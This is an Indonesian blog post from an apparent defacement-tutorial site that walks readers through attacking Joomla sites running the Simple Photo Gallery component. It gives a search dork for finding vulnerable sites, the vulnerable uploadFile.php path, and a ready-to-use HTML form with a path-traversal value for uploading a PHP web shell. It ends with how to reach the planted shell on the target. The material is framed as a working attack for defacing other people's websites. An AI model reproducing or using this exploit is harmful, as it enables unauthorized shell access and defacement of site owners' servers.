Tutorial Deface : Deface Joomla Simple Photo Gallery Shell Upload - Defa Squad

Tempat Belajar Deface

Post Top Ad

Thursday, July 13, 2017

Tutorial Deface : Deface Joomla Simple Photo Gallery Shell Upload

Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?

Dork -> inurl:com_simplephotogallery
Exploit ->  /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini : 

 20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))


Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Enjoy Aje">
</form>

Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php

sumber : https://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html

No comments:

Post a Comment

Post Top Ad